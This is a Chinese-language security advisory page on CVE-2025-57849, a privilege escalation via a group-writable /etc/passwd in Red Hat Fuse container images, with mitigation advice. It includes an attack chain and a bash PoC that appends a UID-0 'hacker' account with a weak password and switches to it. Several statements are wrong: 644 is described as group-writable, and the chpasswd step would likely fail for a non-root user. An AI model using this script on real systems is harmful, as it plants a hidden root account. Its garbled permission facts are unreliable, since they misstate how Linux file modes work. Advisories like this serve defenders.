CVE-2025-57849: Fuse容器镜像/etc/passwd权限配置错误导致权限提升漏洞

漏洞信息

漏洞编号

CVE-2025-57849

漏洞类型

容器权限提升

CVSS评分

6.4 中危

攻击向量

本地 (AV:L)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

Red Hat Fuse

漏洞概述

CVE-2025-57849是一个影响Red Hat Fuse容器镜像的特权提升漏洞。该漏洞源于容器镜像构建过程中，/etc/passwd文件的权限配置错误，被设置为组可写（group-writable）状态。在特定条件下，攻击者即使以非root用户身份在受影响容器内执行命令，也能利用其root组成员身份修改/etc/passwd文件。攻击者可通过在/etc/passwd中添加新用户并将其UID设置为0（root UID），从而在容器内获得完整的root权限，实现容器特权提升。此漏洞的CVSS评分为6.4，属于中等严重等级。攻击向量为本地访问，需要高权限认证但无需用户交互，对机密性、完整性和可用性均造成高影响。

技术细节

该漏洞的根本原因在于Fuse容器镜像构建时，/etc/passwd文件的权限被错误配置为组可写。在标准的Linux权限模型中，/etc/passwd文件通常仅允许root用户修改，其标准权限为-rw-r--r--（644），确保只有root用户具有写权限。然而，当/etc/passwd被设置为组可写（如-rw-rw-r--，644或0664）时，root组内的任何用户都有权修改该文件内容。攻击者利用此配置错误，可以将类似test:x:0:0:root:/root:/bin/bash的新记录添加到/etc/passwd文件中，从而创建一个UID为0的新用户账号。由于UID 0在Linux系统中等价于root用户，该账号将拥有完整的root权限。攻击者随后可通过su或sudo命令切换至该新建账号，获得容器内的最高权限，最终实现容器逃逸或横向移动的前提条件。

攻击链分析

STEP 1

1

初始访问：攻击者获得受影响Fuse容器的非root用户访问权限（如通过漏洞利用或配置错误）

STEP 2

2

权限识别：攻击者检查当前用户组，确认具有root组（gid=0）成员身份

STEP 3

3

漏洞验证：检查/etc/passwd文件权限，确认其具有组可写属性（通常为0664或0644）

STEP 4

4

特权提升：向/etc/passwd添加新用户记录，将UID设置为0（GID=0），创建伪root账号

STEP 5

5

持久化：为新创建的用户设置密码，完成账号激活

STEP 6

6

完全控制：使用su命令切换至新建的root账号，获得容器内完整root权限

STEP 7

7

后续利用：攻击者可利用获得的root权限进行数据窃取、横向移动或尝试容器逃逸

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/bin/bash
# CVE-2025-57849 PoC - Container Privilege Escalation via /etc/passwd
# Prerequisites: Non-root user with root group membership in affected Fuse container

# Step 1: Verify current user and group membership
echo "[+] Current user: $(whoami)"
echo "[+] Groups: $(id)"

# Step 2: Check /etc/passwd permissions (should be group-writable if vulnerable)
echo "[+] Checking /etc/passwd permissions:"
ls -la /etc/passwd

# Step 3: Check if /etc/passwd is group-writable
if [ -w /etc/passwd ]; then
    echo "[+] /etc/passwd is writable! Proceeding with exploitation..."
    
    # Step 4: Create new root user by adding entry to /etc/passwd
    # Format: username:password_hash:UID:GID:comment:home:shell
    # Create user 'hacker' with UID 0 (root)
    echo "hacker:x:0:0:root:/root:/bin/bash" >> /etc/passwd
    
    # Step 5: Set password for the new root user
    echo "hacker:password123" | chpasswd
    
    echo "[+] Root user 'hacker' created successfully!"
    
    # Step 6: Verify the new user exists
    echo "[+] Verifying user creation:"
    grep "hacker" /etc/passwd
    
    # Step 7: Switch to root user
    echo "[+] Switching to root user..."
    su - hacker
else
    echo "[-] /etc/passwd is not writable. System may not be vulnerable."
fi

# Cleanup: Remove created user (for testing purposes)
# sed -i '/^hacker:/d' /etc/passwd

影响范围

Red Hat Fuse 7.x 某些镜像版本

受影响的Fuse容器镜像（构建时错误配置/etc/passwd权限）

防御指南

临时缓解措施

在等待官方修复期间，可采取以下临时缓解措施：1）检查当前运行中的Fuse容器，确认/etc/passwd文件权限，若为组可写状态应立即重建容器；2）使用Kubernetes PodSecurityPolicy或Open Policy Agent限制容器内用户权限；3）对容器镜像进行加固，确保构建过程中/etc/passwd权限设置为644；4）限制容器的root组访问，避免非特权用户被添加到root组；5）监控容器内对/etc/passwd文件的修改行为，设置安全告警。